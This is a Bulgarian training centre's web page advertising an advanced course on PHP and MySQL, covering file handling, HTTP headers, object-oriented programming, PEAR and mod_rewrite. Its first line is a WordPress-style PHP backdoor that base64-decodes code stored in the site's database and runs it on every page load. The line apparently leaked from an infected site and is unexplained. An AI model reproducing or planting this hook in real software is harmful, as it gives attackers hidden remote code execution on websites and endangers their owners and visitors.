add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); PHP and MySQL - Part 2 - НАРС

PHP and MySQL – Part 2

Какво включва?
В този курс студентите ще научат по специфични черти на езика PHP, както и напреднали технологии за разработване на комплексни web приложения. Учебната програма обхваща работа с файлове, controlling the HTTP headers, обектно-ориентирано програмиране и управление на изключенията, PEAR модули, работа с Apache и mod_rewrite, както и реални практически примери. Курсът завършва с практически проект, в който студентите ще могат да прилагат уменията научени по време на курса.

За кого е предназначен?
Курсът би бил полезен за всички, които имат по-сериозни познания в областта на програмирането или са преминали курс – “PHP and MySQL Web Development – Part 1” в НАРС. За пълното разбиране на включения материал е необходимо курсиста да има солидни основни познания в програмирането на PHP и силна мотивация за работа.

Какво получава всеки курсист?
Всички курсисти, преминали обучението “PHP Web Development – Part 2”, получават документ за участието си.

Заедно с това всеки курсист получава отстъпка при записване в други курсове на НАРС.

Финален изпит на преминалото обучение се провежда по желание на студентите в курса, поради което не е включен в програмата.

Изтеглете програмата за курса.

Вижте цените и графика за провеждане на курсовете.

Изтеглете брошура с информация за всички курсове.

За повече информация може да се свържете с нас.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad